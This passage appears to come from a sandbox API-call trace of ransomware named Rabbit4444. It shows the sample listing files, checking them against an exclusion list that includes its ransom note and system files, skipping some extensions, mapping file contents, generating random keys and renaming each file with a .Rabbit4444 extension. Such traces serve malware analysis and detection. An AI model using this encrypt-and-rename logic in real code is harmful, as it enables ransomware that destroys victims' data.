(HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.864] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0056.864] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.864] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0056.865] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.865] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0056.865] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.865] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0056.865] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14817563152) returned 1 [0056.865] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0056.865] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0056.865] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.865] CloseHandle (hObject=0x298) returned 1 [0056.865] CloseHandle (hObject=0x278) returned 1 [0056.865] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageRestoreRestore.settingcontent-ms.Rabbit4444") returned 176 [0056.865] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageRestoreRestore.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagerestorerestore.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageRestoreRestore.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagerestorerestore.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.866] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13225d16, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x13225d16, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x233e650b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x44e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPageScreenPowerAndSleep.settingcontent-ms", cAlternateFileName="AA98C3~1.SET")) returned 1 [0056.871] lstrcmpiW (lpString1="AAA_SettingsPageScreenPowerAndSleep.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.872] lstrcmpiW (lpString1="AAA_SettingsPageScreenPowerAndSleep.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.872] lstrcmpiW (lpString1="AAA_SettingsPageScreenPowerAndSleep.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.872] lstrcmpiW (lpString1="AAA_SettingsPageScreenPowerAndSleep.settingcontent-ms", lpString2=".") returned 1 [0056.872] lstrcmpiW (lpString1="AAA_SettingsPageScreenPowerAndSleep.settingcontent-ms", lpString2="..") returned 1 [0056.872] lstrcmpiW (lpString1="AAA_SettingsPageScreenPowerAndSleep.settingcontent-ms", lpString2="windows") returned -1 [0056.872] lstrcmpiW (lpString1="AAA_SettingsPageScreenPowerAndSleep.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.872] lstrcmpiW (lpString1="AAA_SettingsPageScreenPowerAndSleep.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.872] lstrcmpiW (lpString1="AAA_SettingsPageScreenPowerAndSleep.settingcontent-ms", lpString2="boot") returned -1 [0056.872] lstrcmpiW (lpString1="AAA_SettingsPageScreenPowerAndSleep.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.872] lstrcmpiW (lpString1="AAA_SettingsPageScreenPowerAndSleep.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.872] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPageScreenPowerAndSleep.settingcontent-ms" | out: lpString1="AAA_SettingsPageScreenPowerAndSleep.settingcontent-ms") returned="AAA_SettingsPageScreenPowerAndSleep.settingcontent-ms" [0056.872] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageScreenPowerAndSleep.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.872] lstrlenW (lpString="AAA_SettingsPageScreenPowerAndSleep.settingcontent-ms") returned 53 [0056.872] lstrlenW (lpString="Rabbit4444") returned 10 [0056.872] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.872] lstrlenW (lpString=".dll") returned 4 [0056.872] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.872] lstrlenW (lpString=".lnk") returned 4 [0056.872] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.872] lstrlenW (lpString=".ini") returned 4 [0056.872] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.872] lstrlenW (lpString=".sys") returned 4 [0056.873] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.873] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageScreenPowerAndSleep.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagescreenpowerandsleep.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.873] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.873] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14818355221) returned 1 [0056.873] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1102) returned 1 [0056.873] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0056.873] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1016b0 [0056.873] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x750, lpName=0x0) returned 0x298 [0056.874] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x750) returned 0x70000 [0056.875] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.875] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0056.875] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.875] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0056.875] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.875] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0056.875] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.875] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0056.875] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14818602379) returned 1 [0056.875] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0056.875] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1016b0 | out: hHeap=0xe0000) returned 1 [0056.875] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.875] CloseHandle (hObject=0x298) returned 1 [0056.876] CloseHandle (hObject=0x278) returned 1 [0056.876] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageScreenPowerAndSleep.settingcontent-ms.Rabbit4444") returned 181 [0056.876] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageScreenPowerAndSleep.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagescreenpowerandsleep.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageScreenPowerAndSleep.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagescreenpowerandsleep.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.876] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x133ef956, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x133ef956, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2394398e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x40d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPageSpeech.settingcontent-ms", cAlternateFileName="AA0C1F~1.SET")) returned 1 [0056.876] lstrcmpiW (lpString1="AAA_SettingsPageSpeech.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.876] lstrcmpiW (lpString1="AAA_SettingsPageSpeech.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.876] lstrcmpiW (lpString1="AAA_SettingsPageSpeech.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.876] lstrcmpiW (lpString1="AAA_SettingsPageSpeech.settingcontent-ms", lpString2=".") returned 1 [0056.876] lstrcmpiW (lpString1="AAA_SettingsPageSpeech.settingcontent-ms", lpString2="..") returned 1 [0056.877] lstrcmpiW (lpString1="AAA_SettingsPageSpeech.settingcontent-ms", lpString2="windows") returned -1 [0056.877] lstrcmpiW (lpString1="AAA_SettingsPageSpeech.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.877] lstrcmpiW (lpString1="AAA_SettingsPageSpeech.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.877] lstrcmpiW (lpString1="AAA_SettingsPageSpeech.settingcontent-ms", lpString2="boot") returned -1 [0056.877] lstrcmpiW (lpString1="AAA_SettingsPageSpeech.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.877] lstrcmpiW (lpString1="AAA_SettingsPageSpeech.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.877] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPageSpeech.settingcontent-ms" | out: lpString1="AAA_SettingsPageSpeech.settingcontent-ms") returned="AAA_SettingsPageSpeech.settingcontent-ms" [0056.877] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageSpeech.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.877] lstrlenW (lpString="AAA_SettingsPageSpeech.settingcontent-ms") returned 40 [0056.877] lstrlenW (lpString="Rabbit4444") returned 10 [0056.877] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.877] lstrlenW (lpString=".dll") returned 4 [0056.877] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.877] lstrlenW (lpString=".lnk") returned 4 [0056.877] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.877] lstrlenW (lpString=".ini") returned 4 [0056.877] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.877] lstrlenW (lpString=".sys") returned 4 [0056.877] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.877] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageSpeech.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagespeech.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.878] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.878] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14818842114) returned 1 [0056.878] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1037) returned 1 [0056.878] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0056.878] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0056.878] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x710, lpName=0x0) returned 0x298 [0056.880] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x710) returned 0x70000 [0056.880] CryptAcquireContextW (in: phProv=0x130bbd0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x130bbd0*=0x101b78) returned 1 [0056.881] CryptGenRandom (in: hProv=0x101b78, dwLen=0x80, pbBuffer=0x130bbec | out: pbBuffer=0x130bbec) returned 1 [0056.881] CryptReleaseContext (hProv=0x101b78, dwFlags=0x0) returned 1 [0056.881] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.881] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0056.881] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.881] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0056.881] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.881] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0056.881] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.882] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0056.882] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14819230363) returned 1 [0056.882] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0056.882] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0056.882] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.882] CloseHandle (hObject=0x298) returned 1 [0056.882] CloseHandle (hObject=0x278) returned 1 [0056.882] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageSpeech.settingcontent-ms.Rabbit4444") returned 168 [0056.882] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageSpeech.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagespeech.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageSpeech.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagespeech.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.883] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13651edb, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x13651edb, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a4ea03, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x408, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPageStart.settingcontent-ms", cAlternateFileName="AA7F40~1.SET")) returned 1 [0056.883] lstrcmpiW (lpString1="AAA_SettingsPageStart.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.883] lstrcmpiW (lpString1="AAA_SettingsPageStart.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.883] lstrcmpiW (lpString1="AAA_SettingsPageStart.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.883] lstrcmpiW (lpString1="AAA_SettingsPageStart.settingcontent-ms", lpString2=".") returned 1 [0056.883] lstrcmpiW (lpString1="AAA_SettingsPageStart.settingcontent-ms", lpString2="..") returned 1 [0056.883] lstrcmpiW (lpString1="AAA_SettingsPageStart.settingcontent-ms", lpString2="windows") returned -1 [0056.883] lstrcmpiW (lpString1="AAA_SettingsPageStart.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.883] lstrcmpiW (lpString1="AAA_SettingsPageStart.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.883] lstrcmpiW (lpString1="AAA_SettingsPageStart.settingcontent-ms", lpString2="boot") returned -1 [0056.883] lstrcmpiW (lpString1="AAA_SettingsPageStart.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.883] lstrcmpiW (lpString1="AAA_SettingsPageStart.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.883] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPageStart.settingcontent-ms" | out: lpString1="AAA_SettingsPageStart.settingcontent-ms") returned="AAA_SettingsPageStart.settingcontent-ms" [0056.883] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageStart.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.883] lstrlenW (lpString="AAA_SettingsPageStart.settingcontent-ms") returned 39 [0056.883] lstrlenW (lpString="Rabbit4444") returned 10 [0056.883] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.883] lstrlenW (lpString=".dll") returned 4 [0056.883] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.883] lstrlenW (lpString=".lnk") returned 4 [0056.883] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.883] lstrlenW (lpString=".ini") returned 4 [0056.883] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.883] lstrlenW (lpString=".sys") returned 4 [0056.883] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.884] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageStart.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagestart.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.884] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.884] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14819454713) returned 1 [0056.884] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1032) returned 1 [0056.884] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0056.884] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1015a0 [0056.884] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x710, lpName=0x0) returned 0x298 [0056.885] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x710) returned 0x70000 [0056.886] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.886] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0056.886] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.886] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0056.886] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.886] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0056.886] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.886] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0056.886] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14819694040) returned 1 [0056.886] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0056.886] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1015a0 | out: hHeap=0xe0000) returned 1 [0056.886] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.886] CloseHandle (hObject=0x298) returned 1 [0056.886] CloseHandle (hObject=0x278) returned 1 [0056.887] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageStart.settingcontent-ms.Rabbit4444") returned 167 [0056.887] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageStart.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagestart.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageStart.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagestart.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.887] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13b62f1d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x13b62f1d, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a4ea03, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4ae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPageStorageSenseSaveLocations.settingcontent-ms", cAlternateFileName="AA3F18~1.SET")) returned 1 [0056.887] lstrcmpiW (lpString1="AAA_SettingsPageStorageSenseSaveLocations.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.887] lstrcmpiW (lpString1="AAA_SettingsPageStorageSenseSaveLocations.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.888] lstrcmpiW (lpString1="AAA_SettingsPageStorageSenseSaveLocations.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.888] lstrcmpiW (lpString1="AAA_SettingsPageStorageSenseSaveLocations.settingcontent-ms", lpString2=".") returned 1 [0056.888] lstrcmpiW (lpString1="AAA_SettingsPageStorageSenseSaveLocations.settingcontent-ms", lpString2="..") returned 1 [0056.888] lstrcmpiW (lpString1="AAA_SettingsPageStorageSenseSaveLocations.settingcontent-ms", lpString2="windows") returned -1 [0056.888] lstrcmpiW (lpString1="AAA_SettingsPageStorageSenseSaveLocations.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.888] lstrcmpiW (lpString1="AAA_SettingsPageStorageSenseSaveLocations.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.888] lstrcmpiW (lpString1="AAA_SettingsPageStorageSenseSaveLocations.settingcontent-ms", lpString2="boot") returned -1 [0056.888] lstrcmpiW (lpString1="AAA_SettingsPageStorageSenseSaveLocations.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.888] lstrcmpiW (lpString1="AAA_SettingsPageStorageSenseSaveLocations.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.888] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPageStorageSenseSaveLocations.settingcontent-ms" | out: lpString1="AAA_SettingsPageStorageSenseSaveLocations.settingcontent-ms") returned="AAA_SettingsPageStorageSenseSaveLocations.settingcontent-ms" [0056.888] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageStorageSenseSaveLocations.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.888] lstrlenW (lpString="AAA_SettingsPageStorageSenseSaveLocations.settingcontent-ms") returned 59 [0056.888] lstrlenW (lpString="Rabbit4444") returned 10 [0056.888] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.888] lstrlenW (lpString=".dll") returned 4 [0056.888] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.888] lstrlenW (lpString=".lnk") returned 4 [0056.888] lstrcmpiW 